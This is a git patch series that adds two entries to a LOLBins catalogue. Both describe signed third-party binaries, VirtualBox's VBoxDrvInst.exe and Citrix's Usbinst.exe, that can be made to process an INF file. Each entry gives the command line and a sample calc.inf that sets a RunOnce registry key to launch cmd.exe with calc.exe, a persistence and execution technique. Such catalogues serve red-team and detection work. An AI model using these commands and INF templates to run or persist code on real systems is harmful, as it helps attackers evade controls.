From 3764944412be3af722360640d1a937832b0911d0 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:18:45 -0400 Subject: [PATCH 1/4] VBoxDrvInst.exe added --- LOLBins.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LOLBins.md b/LOLBins.md index dbd3ebd..579d83a 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -87,6 +87,6 @@ If you are missing from the acknowledgement, please let me know (I did not forge # OTHER NON MICROSOFT BINARIES [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) - +[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) From 2e60d71af2db3667c3c3db64e2b6a0920a6f30c8 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:21:22 -0400 Subject: [PATCH 2/4] Create VBoxDrvInst.md --- OtherBinaries/VBoxDrvInst.md | 45 ++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 OtherBinaries/VBoxDrvInst.md diff --git a/OtherBinaries/VBoxDrvInst.md b/OtherBinaries/VBoxDrvInst.md new file mode 100644 index 0000000..8d88d5b --- /dev/null +++ b/OtherBinaries/VBoxDrvInst.md @@ -0,0 +1,45 @@ +## VBoxDrvInst.exe + +* Functions: Persistence + +``` +VBoxDrvInst.exe driver executeinf c:\temp\calc.inf +``` + +Acknowledgements: +* Pierre-Alexandre Braeken - @pabraeken + +Code sample: +* + +Resources: +* https://twitter.com/pabraeken/status/993497996179492864 + +Full path: +``` +C:\Program Files\Oracle\VirtualBox Guest Additions +``` + +Notes: +calc.inf +``` +; DRIVER.INF +; Copyright (c) Microsoft Corporation. All rights reserved. + +[Version] +Signature = "$CHICAGO$" +Class=61883 +ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} +Provider=%Msft% +DriverVer=06/21/2006,6.1.7600.16385 + +[DestinationDirs] +DefaultDestDir = 1 + +[DefaultInstall] +AddReg = CalcStart + +[CalcStart] +HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" +``` + From 9232eb43c5350aaf11b141af059711d2f9c813f1 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:35:42 -0400 Subject: [PATCH 3/4] Usbinst.exe added --- LOLBins.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LOLBins.md b/LOLBins.md index 579d83a..b780923 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -88,5 +88,5 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) - +[Usbinst.exe](OtherBinaries/Usbinst.md) From de7c269e120085790f27f6ca8a3c7380008a1748 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:38:20 -0400 Subject: [PATCH 4/4] Create Usbinst.md --- OtherBinaries/Usbinst.md | 48 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 OtherBinaries/Usbinst.md diff --git a/OtherBinaries/Usbinst.md b/OtherBinaries/Usbinst.md new file mode 100644 index 0000000..8ad5e24 --- /dev/null +++ b/OtherBinaries/Usbinst.md @@ -0,0 +1,48 @@ +## Usbinst.exe + +* Functions: Execute + +``` +Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" + +``` + +Acknowledgements: +* Pierre-Alexandre Braeken - @pabraeken + + +Resources: +* https://twitter.com/pabraeken/status/993514357807108096 + +Full path: +``` +C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe +``` + +Notes: +calc.inf +``` +; DRIVER.INF +; Copyright (c) Microsoft Corporation. All rights reserved. + +[Version] +Signature = "$CHICAGO$" +Class=61883 +ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} +Provider=%Msft% +DriverVer=06/21/2006,6.1.7600.16385 + +[DestinationDirs] +DefaultDestDir = 1 + +[DefaultInstall] +AddReg = CalcStart + +[CalcStart] +HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" +``` + + + + +